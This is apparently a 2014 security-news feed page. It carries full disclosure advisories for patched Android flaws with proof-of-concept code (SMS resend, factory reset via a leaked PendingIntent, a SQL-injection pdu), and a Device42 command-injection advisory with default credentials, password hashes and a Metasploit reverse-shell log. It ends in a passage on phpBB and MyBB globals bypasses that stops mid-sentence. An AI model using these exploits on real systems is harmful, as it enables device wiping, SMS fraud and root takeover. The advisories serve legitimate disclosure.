Channel: BOT24

Hard disk hacking - Intro

Hard disks: if you read this, it's pretty much certain you use one or more of the things. They're pretty simple: they basically present a bunch of 512-byte sectors, numbered by an increasing address, also known as the LBA or Logical Block Address. The PC the HD is connected to can read or write data to and from these sectors. Usually, a file system is used that abstracts all those sectors to files and folders.


more here........http://spritesmods.com/?art=hddhack&page=1

Google Chrome caused a kernel crash..!

Google Chrome caused a kernel crash here..........http://www.binarysniper.net/2014/11/google-chrome-caused-kernel-crash.html

Dumping a Domain’s Worth of Passwords With Mimikatz pt. 2

A year ago, @mubix published a cool post on http://carnal0wnage.attackresearch.com/ about “Dumping a domain’s worth of passwords with mimikatz“. In the article, he talked about using a combination of PowerShell, file shares, .bat scripts and output files in order to run Mimikatz across a large number of machines in an enterprise using just WMI.

A few months ago, @obscuresec posted a great article on using PowerShell as a quick and dirty web server. I started thinking about how to incorporate Chris’ work with Rob’s approach to simplify the attack flow a bit.

more here..........http://www.harmj0y.net/blog/powershell/dumping-a-domains-worth-of-passwords-with-mimikatz-pt-2/

Paper: Wait a minute! A fast, Cross-VM attack on AES

In cloud computing, efficiencies are reaped by resource sharing such as co-location of computation and deduplication of data. This work exploits resource sharing in virtualization software to build a powerful cache-based attack on AES. We demonstrate the vulnerability by mounting Cross-VM Flush+Reload cache attacks in VMware VMs to recover the keys of an AES implementation of OpenSSL 1.0.1 running inside the victim VM. Furthermore, the attack works in a realistic setting where different VMs are located on separate cores. The modified Flush+Reload attack we present takes only on the order of seconds to minutes to succeed in a cross-VM setting. Therefore long-term co-location, as required by other fine-grained attacks in the literature, is not needed. The results of this study show that there is a great security risk to the OpenSSL AES implementation running on VMware cloud services when deduplication is not disabled.

more here..........http://eprint.iacr.org/2014/435.pdf

Stupid is as Stupid Does When It Comes to .NET Remoting

Finding vulnerabilities in .NET is something I quite enjoy; it generally meets my criteria of only looking for logic bugs. Probably the first research I did was into .NET serialization where I got some interesting results, and my first Blackhat USA presentation slot. One of the places where you could abuse serialization was in .NET remoting, which is a technology similar to Java RMI or CORBA to access .NET objects remotely (or on the same machine using IPC). Microsoft consider it a legacy technology and you shouldn't use it, but that won't stop people.

more here.........http://tyranidslair.blogspot.co.uk/2014/11/stupid-is-as-stupid-does-when-it-comes.html

GemFire: From OQLi to RCE through reflection

During a penetration testing activity on one of our customers, we had to assess the security of some web services that interacted with an underlying GemFire database.

more here.........http://blog.emaze.net/2014/11/gemfire-from-oqli-to-rce-through.html

Burp CO2 now sports some Laudanum Scripts!

There have been a number of updates to the Burp CO2 extension suite over the past couple of months but the most exciting one is the addition of Laudanum functionality.  The Laudanum Project consists of a set of exploit scripts that are useful during penetration tests when the tester encounters the ability to upload files somewhere in the web root of an application server.

more here........http://blog.secureideas.com/2014/11/burp-co2-now-sports-some-laudanum.html

CVE-2014-8610 Android < 5.0 SMS resend vulnerability

INTRODUCTION
==================================
In Android <5.0, an unprivileged app can resend all the SMS stored in the user's phone to their corresponding recipients or senders, without user interaction, regardless of whether those SMS were sent to or received from other people. This can incur unwanted costs for the user.
Even worse, since Android also allows an unprivileged app to create a draft SMS, a bad app that combines this with the trick above can send any SMS without holding the SMS permission.

DETAILS
==================================
This vulnerability exists in the following source file of the Mms app:
https://android.googlesource.com/platform/packages/apps/Mms/+/android-4.4.4_r2.0.1/src/com/android/mms/transaction/SmsReceiverService.java
If a bad app broadcasts an intent with the action "com.android.mms.transaction.MESSAGE_SENT", it reaches the method "handleSmsSent". If the bad app can also control the result code to be RESULT_ERROR_RADIO_OFF, execution reaches the following conditional branch, where the SMS (determined by uri) is moved to a queue to be resent:

private void handleSmsSent(Intent intent, int error) {
    ...
    } else if ((mResultCode == SmsManager.RESULT_ERROR_RADIO_OFF) || (mResultCode == SmsManager.RESULT_ERROR_NO_SERVICE)) {
        if (Log.isLoggable(LogTag.TRANSACTION, Log.VERBOSE)) {
            Log.v(TAG, "handleSmsSent: no service, queuing message w/ uri: " + uri);
        }
        // We got an error with no service or no radio. Register for state changes so
        // when the status of the connection/radio changes, we can try to send the
        // queued up messages.
        registerForServiceStateChanges();
        // We couldn't send the message, put in the queue to retry later.
        Sms.moveMessageToFolder(this, uri, Sms.MESSAGE_TYPE_QUEUED, error);
    ...

The POC code is as follows:

Intent intent = new Intent("com.android.mms.transaction.MESSAGE_SENT");
intent.setData(Uri.parse("content://sms"));
intent.setClassName("com.android.mms", "com.android.mms.transaction.SmsReceiver");
sendOrderedBroadcast(intent, null, null, null, SmsManager.RESULT_ERROR_RADIO_OFF, null, null);

Some tips about the POC:
1. The uri is content://sms without an ID, which means all stored SMS will be resent.
2. An explicit intent must be used.
3. This overload of sendOrderedBroadcast lets the caller set the initial result code.

Normally, once the SMS is moved to the queue, it will be sent automatically!

But can we craft any SMS message? Here is a trick:

Currently, any app can create a draft SMS without permission with a code snippet like the following:

Intent intent1 = new Intent("android.intent.action.SENDTO");
intent1.setData(Uri.parse("smsto:yourphonenumber"));
intent1.putExtra("sms_body", "another test sms1!");
startActivity(intent1);

After sending the above intent, the app can wait a short time and then start another activity. This causes ComposeMessageActivity in the Mms app to call onStop(), which saves the draft into the database, from where it can be resent later. Thus any SMS message can be crafted without a permission requirement.

This has been fixed in Android 5.0 (Android bug id 17671795)
https://android.googlesource.com/platform/packages/apps/Mms/+/008d6202fca4002a7dfe333f22377faa73585c67

TIMELINE
==================================
26.09.2014 Initial report to Android Security Team with the POC
27.09.2014 Reply from Android Security Team "are looking into it"
30.09.2014 Found that an app can create a draft and notified Android Security Team with an updated POC
02.10.2014 Reply from Android Security Team "We will fix this issue in the next major release"
04.11.2014 Android 5.0 source code is open, the fix for this issue is found in change log, ask Android Security Team when this can be published
09.11.2014 Contact MITRE about this issue
20.11.2014 CVE-2014-8610 assigned
25.11.2014 Got Permission from Android Security Team to publish this
26.11.2014 Public Disclosure

IDENTIFIERS
==================================
CVE-2014-8610
Android id 17671795

CREDITS
==================================
WangTao (neobyte) of Baidu X-Team
WangYu of Baidu X-Team
Zhang Donghui of Baidu X-Team

--
BAIDU X-TEAM (xteam.baidu.com)
An external link of this advisory can be found at http://xteam.baidu.com/?p=164

CVE-2014-8609 Android Settings application privilege leakage vulnerability

INTRODUCTION
==================================
In Android <5.0 (and possibly >= 4.0), the Settings application leaks a PendingIntent with a blank base intent (neither the component nor the action is explicitly set) to third-party applications. A bad app can use it to broadcast intents with the same permissions and identity as the Settings application, which runs as the SYSTEM uid. Thus a bad app can broadcast sensitive intents with SYSTEM permission.

DETAILS
==================================
The vulnerability exists in AddAccountSettings.java in the Settings app:
https://android.googlesource.com/platform/packages/apps/Settings/+/android-4.4.4_r2.0.1/src/com/android/settings/accounts/AddAccountSettings.java

In the method addAccount, a PendingIntent is created by getBroadcast; the problem is that neither the action nor the component is explicitly set:

    private void addAccount(String accountType) {
        Bundle addAccountOptions = new Bundle();
        mPendingIntent = PendingIntent.getBroadcast(this, 0, new Intent(), 0);
        addAccountOptions.putParcelable(KEY_CALLER_IDENTITY, mPendingIntent);
        addAccountOptions.putBoolean(EXTRA_HAS_MULTIPLE_USERS, Utils.hasMultipleUsers(this));
        AccountManager.get(this).addAccount(
                accountType,
                null, /* authTokenType */
                null, /* requiredFeatures */
                addAccountOptions,
                null,
                mCallback,
                null /* handler */);
        mAddAccountCalled  = true;
    }

This PendingIntent is then stored in addAccountOptions, which is sent to another application.

According to the Android developer guides, this is not secure (see http://developer.android.com/reference/android/app/PendingIntent.html):
"By giving a PendingIntent to another application, you are granting it the right to perform the operation you have specified as if the other application was yourself (with the same permissions and identity). As such, you should be careful about how you build the PendingIntent: almost always, for example, the base Intent you supply should have the component name explicitly set to one of your own components, to ensure it is ultimately sent there and nowhere else."

The bad app can register as an account authenticator by declaring a service with the following intent filter (no permission is needed):

    <intent-filter>
       <action android:name="android.accounts.AccountAuthenticator" />
    </intent-filter>

Then the bad app can send an intent to the Settings app, asking it to add an account of the requested account type:

    Intent intent = new Intent();
    intent.setComponent(new ComponentName("com.android.settings","com.android.settings.accounts.AddAccountSettings"));
    intent.setAction(Intent.ACTION_RUN);
    intent.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
    String authTypes[] = {AccountGeneral.ACCOUNT_TYPE};

    intent.putExtra("account_types", authTypes);
    startActivity(intent);

Upon receiving such an intent, the Settings app (automatically) calls the method addAccount (whose vulnerability is explained above) and sends the PendingIntent to the bad app's addAccount method.

Since the PendingIntent's action and component are blank, the bad app can fill in an arbitrary action and extras and send the PendingIntent again, with the permission of SYSTEM.

For example, the bad app can create a phishing SMS on the phone with the following POC:

public Bundle addAccount(AccountAuthenticatorResponse response, String accountType, String authTokenType, String[] requiredFeatures, Bundle options) throws NetworkErrorException {
    ...
    PendingIntent pendingIntent = (PendingIntent) options.getParcelable("pendingIntent");
    Intent newIntent = new Intent();
    newIntent.setAction("android.provider.Telephony.SMS_RECEIVED");
    // filling phishing sms pdu data
    newIntent.putExtra("pdus", new Object[] { pdu });
    newIntent.putExtra("format", "3gpp");
    try {
        pendingIntent.send(mContext, 0, newIntent, null, null);
    } catch (CanceledException e) {
        // TODO Auto-generated catch block
        e.printStackTrace();
    }

Or force the phone to factory reset, deleting the user's data, with the following POC:

public Bundle addAccount(AccountAuthenticatorResponse response, String accountType, String authTokenType, String[] requiredFeatures, Bundle options) throws NetworkErrorException {
    PendingIntent test = (PendingIntent) options.getParcelable("pendingIntent");
    Intent newIntent2 = new Intent("android.intent.action.MASTER_CLEAR");
    try {
        test.send(mContext, 0, newIntent2, null, null);
    } catch (CanceledException e) {
        // TODO Auto-generated catch block
        e.printStackTrace();
    }

This has been fixed in Android 5.0 (Android bug id 17356824)
https://android.googlesource.com/platform/packages/apps/Settings/+/f5d3e74ecc2b973941d8adbe40c6b23094b5abb7

TIMELINE
==================================
02.09.2014 Initial report to Android Security Team with the phishing SMS POC
03.09.2014 Reply from Android Security Team "opened an internal inquiry about this"
09.09.2014 Find a new factory reset POC and notify Android Security Team
10.09.2014 Reply from Android Security Team "We do acknowledge the issue"
04.11.2014 Android 5.0 source code is open, the fix for this issue is found in change log, ask Android Security Team when this can be published
09.11.2014 Contact MITRE about this issue
20.11.2014 CVE-2014-8609 assigned
25.11.2014 Got Permission from Android Security Team to publish this
26.11.2014 Public Disclosure

IDENTIFIERS
==================================
CVE-2014-8609
Android id 17356824

CREDITS
==================================
WangTao (neobyte) of Baidu X-Team
WangYu of Baidu X-Team
Zhang Donghui of Baidu X-Team


--
BAIDU X-TEAM (xteam.baidu.com)
An external link of this advisory can be found at http://xteam.baidu.com/?p=158

Typos Can have a Bigger Impact Than Expected

Have you ever thought about the cost of a typo? You know what I mean, a simple misspelling of a word somewhere on your website. Do you think there’s a risk in that?

You may have seen the Grammar Police all over your comments yelling that you used the wrong version of “your” and pointing out how stupid you are, right? Unfortunately, that’s the internet. But what if you have misspelled something that your readers can’t see right away?

more here.........http://blog.sucuri.net/2014/11/typos-can-have-a-bigger-impact-than-expected.html

CVE-2014-8507 Android < 5.0 SQL injection vulnerability in WAPPushManager

INTRODUCTION
==================================
In Android <5.0, a SQL injection vulnerability exists in the optional module WAPPushManager. An attacker can remotely send a malformed WAPPush message to launch any activity or service on the victim's phone (subject to permission checks).

DETAILS
==================================
When a WAPPush message is received, the raw pdu is processed by the dispatchWapPdu method in com\android\internal\telephony\WapPushOverSms.java.

Here the pdu is parsed to get the contentType and wapAppId:

            String mimeType = pduDecoder.getValueString();
            ...
            /**
             * Seek for application ID field in WSP header.
             * If application ID is found, WapPushManager substitute the message
             * processing. Since WapPushManager is optional module, if WapPushManager
             * is not found, legacy message processing will be continued.
             */
            if (pduDecoder.seekXWapApplicationId(index, index + headerLength - 1)) {
                index = (int) pduDecoder.getValue32();
                pduDecoder.decodeXWapApplicationId(index);
                String wapAppId = pduDecoder.getValueString();
                if (wapAppId == null) {
                    wapAppId = Integer.toString((int) pduDecoder.getValue32());
                }
                String contentType = ((mimeType == null) ?
                        Long.toString(binaryContentType) : mimeType);
                if (DBG) Rlog.v(TAG, "appid found: " + wapAppId + ":" + contentType);

The wapAppId and contentType can be literal strings embedded in the pdu. To prove this, we can launch an Android 4.4 emulator and send an SMS pdu via the telnet console.

Type the following command in the telnet console:

sms pdu 0040000B915121551532F40004800B05040B84C0020003F001010A065603B081EAAF2720756e696f6e2073656c65637420302c27636f6d2e616e64726f69642e73657474696e6773272c27636f6d2e616e64726f69642e73657474696e67732e53657474696e6773272c302c302c302d2d200002066A008509036D6F62696C65746964696E67732E636F6D2F0001

And watch the radio logcat output in the emulator; it prints the extracted malicious appid:
' union select 0,'com.android.settings','com.android.settings.Settings',0,0,0--

However, since WAPPushManager is optional, it is not installed in the emulator, so it then prints "wap push manager not found!"

But if WAPPushManager is installed, the extracted wapAppId and contentType are passed to its processMessage method:

                try {
                    boolean processFurther = true;
                    IWapPushManager wapPushMan = mWapPushManager;
                    if (wapPushMan == null) {
                        if (DBG) Rlog.w(TAG, "wap push manager not found!");
                    } else {
                        Intent intent = new Intent();
                        intent.putExtra("transactionId", transactionId);
                        intent.putExtra("pduType", pduType);
                        intent.putExtra("header", header);
                        intent.putExtra("data", intentData);
                        intent.putExtra("contentTypeParameters",
                                pduDecoder.getContentParameters());
                        int procRet = wapPushMan.processMessage(wapAppId, contentType, intent);

So we go on to check the source code of WAPPushManager:

https://android.googlesource.com/platform/frameworks/base/+/android-4.4.4_r2.0.1/packages/WAPPushManager/

In the method processMessage, app_id and content_type are passed to the method queryLastApp:

        public int processMessage(String app_id, String content_type, Intent intent)
            throws RemoteException {
            Log.d(LOG_TAG, "wpman processMsg " + app_id + ":" + content_type);
            WapPushManDBHelper dbh = getDatabase(mContext);
            SQLiteDatabase db = dbh.getReadableDatabase();
            WapPushManDBHelper.queryData lastapp = dbh.queryLastApp(db, app_id, content_type);
            db.close();

Then, in the method queryLastApp, both app_id and content_type are concatenated without any escaping to build the SQL string passed to rawQuery:

        protected queryData queryLastApp(SQLiteDatabase db,
                String app_id, String content_type) {
            String sql = "select install_order, package_name, class_name, "
                    + " app_type, need_signature, further_processing"
                    + " from " + APPID_TABLE_NAME
                    + " where x_wap_application=\'" + app_id + "\'"
                    + " and content_type=\'" + content_type + "\'"
                    + " order by install_order desc";
            if (DEBUG_SQL) Log.v(LOG_TAG, "sql: " + sql);
            Cursor cur = db.rawQuery(sql, null);

Obviously, this is a SQL injection. For example, if app_id is as follows:
' union select 0,'com.android.settings','com.android.settings.Settings',0,0,0--

then the package_name and class_name of the query result would be:
"com.android.settings" and "com.android.settings.Settings"

OK, then we return to the method processMessage of WAPPushManager.
The appType, packageName and className are fully controllable, and they are used to set the component of an intent that starts an activity or service.
That means an attacker can remotely launch any activity or service by constructing a malformed WAPPush message (subject to permission checks):

            if (lastapp.appType == WapPushManagerParams.APP_TYPE_ACTIVITY) {
                //Intent intent = new Intent(Intent.ACTION_MAIN);
                intent.setClassName(lastapp.packageName, lastapp.className);
                intent.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
                try {
                    mContext.startActivity(intent);
                } catch (ActivityNotFoundException e) {
                    Log.w(LOG_TAG, "invalid name " +
                            lastapp.packageName + "/" + lastapp.className);
                    return WapPushManagerParams.INVALID_RECEIVER_NAME;
                }
            } else {
                intent.setClassName(mContext, lastapp.className);
                intent.setComponent(new ComponentName(lastapp.packageName,
                        lastapp.className));
                if (mContext.startService(intent) == null) {
                    Log.w(LOG_TAG, "invalid name " +
                            lastapp.packageName + "/" + lastapp.className);
                    return WapPushManagerParams.INVALID_RECEIVER_NAME;
                }
            }
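Added example (not from the advisory or from AOSP): the queryLastApp concatenation reproduced against an in-memory SQLite table with the same columns, beside a parameterized form of the same query. The table name, the sample registration row and the parameterized variant are assumptions; the payload is the one quoted above.

```python
import sqlite3

# Assumed table name: the advisory only shows the APPID_TABLE_NAME constant.
APPID_TABLE_NAME = "appid_tbl"

# The x-wap-application-id extracted from the pdu in the advisory.
INJECTED_APP_ID = (
    "' union select 0,'com.android.settings',"
    "'com.android.settings.Settings',0,0,0--"
)

# Same column list as queryLastApp in the advisory.
SELECT_COLUMNS = ("select install_order, package_name, class_name, "
                  " app_type, need_signature, further_processing"
                  " from " + APPID_TABLE_NAME)


def make_db():
    """In-memory table shaped like WapPushManDBHelper's appid table,
    holding one constructed, legitimate push-handler registration."""
    db = sqlite3.connect(":memory:")
    db.execute(
        "create table " + APPID_TABLE_NAME + " ("
        " x_wap_application text, content_type text, package_name text,"
        " class_name text, app_type integer, need_signature integer,"
        " further_processing integer, install_order integer)"
    )
    # Constructed sample row (hypothetical handler package, not a real one).
    db.execute(
        "insert into " + APPID_TABLE_NAME + " values (?,?,?,?,?,?,?,?)",
        ("x-wap-application:mms.ua", "application/vnd.wap.mms-message",
         "com.example.mms", "com.example.mms.PushReceiver", 0, 1, 0, 1),
    )
    return db


def query_last_app_vulnerable(db, app_id, content_type):
    """Same string concatenation as the queryLastApp shown in the advisory:
    the attacker-controlled app_id becomes part of the SQL text."""
    sql = (SELECT_COLUMNS
           + " where x_wap_application='" + app_id + "'"
           + " and content_type='" + content_type + "'"
           + " order by install_order desc")
    return db.execute(sql).fetchall()


def query_last_app_fixed(db, app_id, content_type):
    """Parameterized variant (assumed fix shape): the values are bound and
    never parsed as SQL. In Android this is rawQuery(sql, selectionArgs)
    with '?' placeholders."""
    sql = (SELECT_COLUMNS
           + " where x_wap_application=? and content_type=?"
           + " order by install_order desc")
    return db.execute(sql, (app_id, content_type)).fetchall()


def target_component(rows):
    """What processMessage does with the first row: the package/class pair
    handed to setClassName(); None when nothing matched."""
    if not rows:
        return None
    _, package_name, class_name, *_ = rows[0]
    return (package_name, class_name)


if __name__ == "__main__":
    db = make_db()
    ctype = "application/vnd.wap.mms-message"
    # Vulnerable: the UNION row supplied by the attacker is dispatched.
    print("vulnerable:", target_component(
        query_last_app_vulnerable(db, INJECTED_APP_ID, ctype)))
    # Fixed: no registration matches the literal payload string.
    print("fixed:     ", target_component(
        query_last_app_fixed(db, INJECTED_APP_ID, ctype)))
```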

This has been fixed in Android 5.0 (Android bug id 17969135)
https://android.googlesource.com/platform/frameworks/base/+/48ed835468c6235905459e6ef7df032baf3e4df6

TIMELINE
==================================
11.10.2014 Initial report to Android Security Team with the POC
14.10.2014 Reply from Android Security Team "are looking into it"
04.11.2014 Android 5.0 source code is open, the fix for this issue is found in change log, request status update
08.11.2014 Reply from Android Security Team "have fixed the issue in L (which is now in AOSP) and have provided patches to partners"
09.11.2014 Contact MITRE about this issue
17.11.2014 CVE-2014-8507 assigned
26.11.2014 Public Disclosure

IDENTIFIERS
==================================
CVE-2014-8507
Android id 17969135

CREDITS
==================================
WangTao (neobyte) of Baidu X-Team
WangYu of Baidu X-Team
Zhang Donghui of Baidu X-Team

--
BAIDU X-TEAM (xteam.baidu.com)
An external link of this advisory can be found at http://xteam.baidu.com/?p=167

Infected HTML Files Bundled in Android Apps

Computer malware can have a long reach, given the right environment. In today’s computing age there are more platforms for malware to cross over and spread, easily latching on to their favorite file hosts.

Recently, we came across some Android apps infected with the VBS file infector Ramnit residing in Google’s Play Store.

more here..........https://blog.malwarebytes.org/mobile-2/2014/11/infected-html-files-bundled-in-android-apps/

device42 DCIM authenticated remote root via appliance manager

Remote Authenticated Root in Device42 DCIM Appliance Manager v5.10 and v6.0

http://www.device42.com/download/

Device42 ships virtual appliances ready for production use as a trial (essentially dictated by the license provided).

The Appliance Manager listens on HTTP (no SSL) on port 4242 with default credentials of d42admin:default.

Within the Appliance Manager, the Ping and Traceroute utilities are susceptible to command injection via bash metacharacters. The user the commands get executed as is the 'ubuntu' user, but this user has passwordless sudo ability, so it is essentially root access. Two exploits are provided that exploit these vulnerabilities using the default credentials.

Updates from device42 are encrypted by default to prevent users from creating their own updates and uploading them, but the password for the encrypted zip file is 'pass:zofo8REgqM', so any user could create their own encrypted update using this passphrase.

openssl enc -aes-256-cbc -d -in /tmp/update.enc -out /tmp/update.zip -pass pass:zofo8REgqM

Also, the root and ubuntu users have default passwords in the shadow file.


 Root –
$6$zhdissWh$2VrhU3tncXClbuUU3dJk2ieAKF3kTPpvcT9/VKw.Yw4rl1E2eYpAYAfZUgSZvYhqVQvUqLVRp8HOsoMueKgd10


 Ubuntu –
$6$1eU5n9o7$w4.tmNriNT1Zb5HabWwlGmnmy8ij1fKbn0UGf9raHKdIaurYVD/ZU9C2s6DBueKhVbekZCozzAoHZH43.OwDi/

msf exploit(device42_tracert_exec) > show options

Module options (exploit/linux/http/device42_tracert_exec):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        Use a proxy chain
   RHOST    192.168.1.81     yes       The target address
   RPORT    4242             yes       The target port
   VHOST                     no        HTTP server virtual host

Payload options (cmd/unix/reverse):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.31     yes       The listen address
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting

msf exploit(device42_tracert_exec) > exploit

[*] Started reverse double handler
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo YWFxSIuVtNUMShSi;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "YWFxSIuVtNUMShSi\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 3 opened (192.168.1.31:4444 -> 192.168.1.81:39878) at 2014-11-22 17:36:59 -0600

sudo su
id
uid=0(root) gid=0(root) groups=0(root)
exit
id
uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),114(sambashare)

--
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website

ModSecurity Advanced Topic of the Week: Detecting Malware with Fuzzy Hashing

In the most recent release of ModSecurity v2.9.0-RC1, we introduced a new operator called @fuzzyHash which uses functionality from the ssdeep tool.  This blog post will demonstrate a powerful use-case with ModSecurity which is identifying malware in web attachment uploads.

more here.........http://blog.spiderlabs.com/2014/11/modsecurity-advanced-topic-of-the-week-detecting-malware-with-fuzzy-hashing.html

phpBB

When PHP's register_globals configuration directive is set on, phpBB calls the deregister_globals() function, and all global variables registered by PHP are destroyed. But the deregister_globals() function can be bypassed.

```
$input = array_merge(
    array_keys($_GET),
    array_keys($_POST),
    array_keys($_COOKIE),
    array_keys($_SERVER),
    array_keys($_SESSION),
    array_keys($_ENV),
    array_keys($_FILES)
);

foreach ($input as $varname)
{
    if (isset($not_unset[$varname]))
    {
        if ($varname !== 'GLOBALS' || isset($_GET['GLOBALS']) ||
            isset($_POST['GLOBALS']) || isset($_SERVER['GLOBALS']) ||
            isset($_SESSION['GLOBALS']) || isset($_ENV['GLOBALS']) ||
            isset($_FILES['GLOBALS']))
        {
            exit;
        }
        else
        {
            $cookie = &$_COOKIE;
            while (isset($cookie['GLOBALS']))
            {
                if (!is_array($cookie['GLOBALS']))
                {
                    break;
                }
                ....
            }
        }
    }
    unset($GLOBALS[$varname]);
}
```

In the above code we see that when the request carries $_COOKIE['GLOBALS'] = 1, $GLOBALS['GLOBALS'] is destroyed by unset(). This means the $GLOBALS array itself is destroyed, and you can no longer use $GLOBALS['key'] to access or control a global variable in all scopes throughout the script, because the binding between the $GLOBALS array and the global symbol table has been broken. All global variables registered by PHP from the $_COOKIE, $_SERVER, $_SESSION, $_ENV, and $_FILES arrays will therefore not be unregistered.

Proof of Concept

```
$_COOKIE['GLOBALS'] = 1;
$_COOKIE['ryat'] = $ryat = 'ryat';

deregister_globals();

var_dump($GLOBALS);
var_dump($ryat);

$GLOBALS['ryat'] = 'hi';

var_dump($GLOBALS);
var_dump($ryat);
```

P.S. I had reported the issue to the phpBB developers, but they do not
consider this a security issue.


Authored by Taoguang Chen
taoguangchen@gmail.com

MyBB

# MyBB <= 1.8.2 unset_globals() Function Bypass and Remote Code Execution Vulnerability

Taoguang Chen <[@chtg57](twitter.com/chtg57)> - 2014.11.21

> MyBB's unset_globals() function can be bypassed under special conditions and it is possible to allows remote code execution.

## I. MyBB's unset_globals() Function Bypass

When PHP's register\_globals configuration is set on, MyBB calls the unset\_globals() function, and all global variables registered by PHP from the $\_POST, $\_GET, $\_FILES, and $\_COOKIE arrays are destroyed.

```
    if(@ini_get("register_globals") == 1)
    {
        $this->unset_globals($_POST);
        $this->unset_globals($_GET);
        $this->unset_globals($_FILES);
        $this->unset_globals($_COOKIE);
    }
    ...
}
...
function unset_globals($array)
{
    if(!is_array($array))
    {
        return;
    }

    foreach(array_keys($array) as $key)
    {
        unset($GLOBALS[$key]);
        unset($GLOBALS[$key]); // Double unset to circumvent the zend_hash_del_key_or_index hole in PHP <4.4.3 and <5.1.4
    }
}
```

But the unset\_globals() function can be bypassed.

### i) $\_GET, $\_FILES, or $\_COOKIE Array Is Destroyed

```
foo.php?_COOKIE=1
// $_GET['_COOKIE']
```

When $\_GET['\_COOKIE']=1 is sent, unset\_globals() destroys $GLOBALS['\_COOKIE'].

```
    $this->unset_globals($_GET);
    ...
}
...
function unset_globals($array)
{
    ...
    foreach(array_keys($array) as $key)
    {
        unset($GLOBALS[$key]);
```

This means the $\_COOKIE array is destroyed, and so all global variables registered by PHP from the $\_COOKIE array survive, because they are never passed to unset().

```
    $this->unset_globals($_COOKIE);
}
...
}
...
function unset_globals($array)
{
    if(!is_array($array))
    {
        return;
    }
```

By the same token, if the $\_GET or $\_FILES array is destroyed via unset\_globals(), the corresponding global variables registered by PHP are not destroyed.

### ii) $GLOBALS Array Is Destroyed

```
foo.php?GLOBALS=1
// $_GET['GLOBALS']
```

When $\_GET['GLOBALS']=1 is sent, unset\_globals() will destroy
$GLOBALS['GLOBALS']. This means $GLOBALS array will be destroyed.

$GLOBALS is an automatic global variable bound to the global symbol table; you can use $GLOBALS['key'] to access or control a global variable in every scope of a script. Once the $GLOBALS array has been destroyed, that binding is broken, so the later unset($GLOBALS[$key]) calls have nothing to act on, and all variables registered by PHP from the $\_GET, $\_FILES and $\_COOKIE arrays survive.

By the same token, when $\_POST['GLOBALS'], $\_FILES['GLOBALS'], or $\_COOKIE['GLOBALS'] is sent, unset\_globals() destroys the $GLOBALS array, and the corresponding global variables registered by PHP are not destroyed.

In fact, MyBB is already aware of the problem:

```
    $protected = array("_GET", "_POST", "_SERVER", "_COOKIE", "_FILES", "_ENV", "GLOBALS");
    foreach($protected as $var)
    {
        if(isset($_REQUEST[$var]) || isset($_FILES[$var]))
        {
            die("Hacking attempt");
        }
    }
```

Unfortunately, there is still a small hole :-)

$\_REQUEST is an associative array that by default contains a mix of
the $\_GET, $\_POST and $\_COOKIE data.

But PHP >= 5.3 introduced the request\_order directive, which decides
what goes into the $\_REQUEST array:

```
request_order = "GP"
```

This is the recommended setting in php.ini. With "GP", only the $\_GET
and $\_POST data is merged into $\_REQUEST; $\_COOKIE data is left out,
so the "Hacking attempt" check above never sees a cookie.

So, on PHP >= 5.3 with this setting, sending $\_COOKIE['GLOBALS']
passes the check and still defeats unset\_globals().
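As an added illustration (not MyBB's code), the same guard written two ways: once over a $\_REQUEST assembled the way request\_order = "GP" assembles it, and once over each input array directly. The function names and the sample request are constructed for this example.

```php
<?php
// Added example, not MyBB's code: the superglobal-name guard written two ways.
// The first consults a $_REQUEST assembled as request_order = "GP" assembles
// it (GET merged with POST, cookies left out); the second reads each input
// array directly, so its verdict does not depend on request_order at all.

$protected = array("_GET", "_POST", "_SERVER", "_COOKIE", "_FILES", "_ENV", "GLOBALS");

// Guard as on the page: returns the offending name, or null when clean.
function guard_via_request(array $request, array $files, array $protected)
{
    foreach ($protected as $var) {
        if (isset($request[$var]) || isset($files[$var])) {
            return $var;   // the page's code would die("Hacking attempt") here
        }
    }
    return null;
}

// Hardened guard: every input array is inspected on its own. array_key_exists
// also catches a key whose value is null, which isset() would overlook.
function guard_direct(array $get, array $post, array $cookie, array $files, array $protected)
{
    foreach (array($get, $post, $cookie, $files) as $source) {
        foreach ($protected as $var) {
            if (array_key_exists($var, $source)) {
                return $var;
            }
        }
    }
    return null;
}

// Constructed request: a harmless query string plus one cookie named GLOBALS.
$get    = array('page' => 'index');
$post   = array();
$cookie = array('GLOBALS' => '1', 'sid' => 'abc');
$files  = array();

// What request_order = "GP" leaves in $_REQUEST: no cookie data at all.
$request_gp = array_merge($get, $post);

var_dump(guard_via_request($request_gp, $files, $protected));   // cookie slips past this guard
var_dump(guard_direct($get, $post, $cookie, $files, $protected)); // cookie is caught by this one
```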

##II. Remote Code Execution Vulnerability

There is one interesting method in MyBB:

```
class MyBB {
        ...
        function __destruct()
        {
                // Run shutdown function
                if(function_exists("run_shutdown"))
                {
                        run_shutdown();
                }
        }
}
```

Look into run\_shutdown() function:

```
function run_shutdown()
{
        global $config, $db, $cache, $plugins, $error_handler,
$shutdown_functions, $shutdown_queries, $done_shutdown, $mybb;
        ...
        // Run any shutdown functions if we have them
        if(is_array($shutdown_functions))
        {
                foreach($shutdown_functions as $function)
                {
                        call_user_func_array($function['function'], $function['arguments']);
                }
        }

        $done_shutdown = true;
}
```

The $shutdown\_functions was initialized via add\_shutdown() function
in init.php:

```
// Set up any shutdown functions we need to run globally
add_shutdown('send_mail_queue');
```

But add\_shutdown() function initialization handler is wrong:

```
function add_shutdown($name, $arguments=array())
{
        global $shutdown_functions;

        if(!is_array($shutdown_functions))
        {
                $shutdown_functions = array();
        }

        if(!is_array($arguments))
        {
                $arguments = array($arguments);
        }

        if(is_array($name) && method_exists($name[0], $name[1]))
        {
                $shutdown_functions[] = array('function' => $name, 'arguments' => $arguments);
                return true;
        }
        else if(!is_array($name) && function_exists($name))
        {
                $shutdown_functions[] = array('function' => $name, 'arguments' => $arguments);
                return true;
        }

        return false;
}
```

In the above code we see that run\_shutdown() is vulnerable because
